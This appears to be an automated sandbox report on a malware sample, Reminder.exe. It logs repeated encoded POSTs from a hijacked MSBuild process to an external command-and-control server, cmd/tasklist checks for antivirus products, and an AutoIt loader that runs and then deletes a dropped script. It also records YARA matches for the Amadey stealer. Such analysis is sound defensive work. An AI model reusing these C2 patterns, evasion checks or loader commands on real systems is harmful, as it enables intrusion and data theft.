Oct 27, 2024 17:11:52.348561049 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	57998	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:53.856777906 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:54.997221947 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Oct 27, 2024 17:11:54.999809027 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	57999	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:56.628777027 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:11:57.533793926 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	58000	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:11:59.044260979 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:11:59.950566053 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:11:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	58001	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:12:01.608752966 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:12:02.503149986 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:12:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	58002	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:12:04.029129982 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:12:04.953649998 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:12:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	58003	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:12:06.594054937 CET	160	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 27, 2024 17:12:07.455554962 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:12:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	58004	152.89.198.124	80	2284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 17:12:08.968569994 CET	312	OUT	POST /8bdDsv3dk2FF/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 152.89.198.124 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 46 43 34 45 35 32 33 38 33 41 31 31 43 35 46 45 37 45 46 46 36 36 32 33 39 33 37 43 39 46 43 45 41 44 46 31 30 39 35 34 38 37 31 30 43 37 34 41 43 42 34 32 36 39 30 33 45 43 31 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D0138FC4E52383A11C5FE7EFF6623937C9FCEADF109548710C74ACB426903EC1
Oct 27, 2024 17:12:09.870383978 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 27 Oct 2024 16:12:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	12:10:02
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\Reminder.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Reminder.exe"
Imagebase:	0x860000
File size:	5'563'800 bytes
MD5 hash:	DF45696EF1463F335A6CC5DC72C607D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:10:02
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe"
Imagebase:	0xa40000
File size:	3'366'912 bytes
MD5 hash:	45CC5C19328748F850CC9FE5E65AC9F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:10:03
Start date:	27/10/2024
Path:	C:\Users\user\Desktop\Reminder.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Imagebase:	0x860000
File size:	5'563'800 bytes
MD5 hash:	DF45696EF1463F335A6CC5DC72C607D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:10:03
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Imagebase:	0xca0000
File size:	3'366'912 bytes
MD5 hash:	45CC5C19328748F850CC9FE5E65AC9F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:10:04
Start date:	27/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Imagebase:	0x7ff74c9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:10:04
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:10:04
Start date:	27/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:	0x7ff6fb7a0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:10:04
Start date:	27/10/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "wrsa.exe"
Imagebase:	0x7ff7699e0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Imagebase:	0x7ff74c9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:	0x7ff6fb7a0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "opssvc.exe"
Imagebase:	0x7ff7b5b80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Imagebase:	0x7ff74c9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:	0x7ff6fb7a0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avastui.exe"
Imagebase:	0x7ff7b5b80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Imagebase:	0x7ff74c9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Imagebase:	0x7ff6fb7a0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:10:05
Start date:	27/10/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avgui.exe"
Imagebase:	0x7ff7b5b80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:10:06
Start date:	27/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Imagebase:	0x7ff74c9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:10:06
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:10:06
Start date:	27/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Imagebase:	0x7ff6fb7a0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:10:06
Start date:	27/10/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "nswscsvc.exe"
Imagebase:	0x7ff7b5b80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:10:06
Start date:	27/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Imagebase:	0x7ff74c9e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	12:10:06
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:10:06
Start date:	27/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Imagebase:	0x7ff6fb7a0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:10:06
Start date:	27/10/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "sophoshealth.exe"
Imagebase:	0x7ff7b5b80000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:10:06
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\friend\Updater.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv"
Imagebase:	0x6d0000
File size:	943'784 bytes
MD5 hash:	3F58A517F1F4796225137E7659AD2ADB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	12:10:50
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:10:50
Start date:	27/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:10:50
Start date:	27/10/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 127.0.0.1
Imagebase:	0x7ff72bec0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	12:10:54
Start date:	27/10/2024
Path:	C:\Users\user\AppData\Local\friend\Updater.exe
Wow64 process (32bit):	true
Commandline:	updater.exe C:\ProgramData\\huv9LF4.a3x
Imagebase:	0x6d0000
File size:	943'784 bytes
MD5 hash:	3F58A517F1F4796225137E7659AD2ADB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000023.00000002.2239705432.000000000428C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:10:58
Start date:	27/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x180000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:10:58
Start date:	27/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xdd0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	12:11:10
Start date:	27/10/2024
Path:	C:\edgheaa\AutoIt3.exe
Wow64 process (32bit):	true
Commandline:	"C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
Imagebase:	0xc70000
File size:	943'784 bytes
MD5 hash:	3F58A517F1F4796225137E7659AD2ADB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000026.00000002.2411065560.00000000044DC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:11:15
Start date:	27/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x400000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	12:11:15
Start date:	27/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x260000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	12:11:15
Start date:	27/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x6b0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	12:11:19
Start date:	27/10/2024
Path:	C:\edgheaa\AutoIt3.exe
Wow64 process (32bit):	true
Commandline:	"C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
Imagebase:	0xc70000
File size:	943'784 bytes
MD5 hash:	3F58A517F1F4796225137E7659AD2ADB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002A.00000002.2499336033.000000000437C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	44
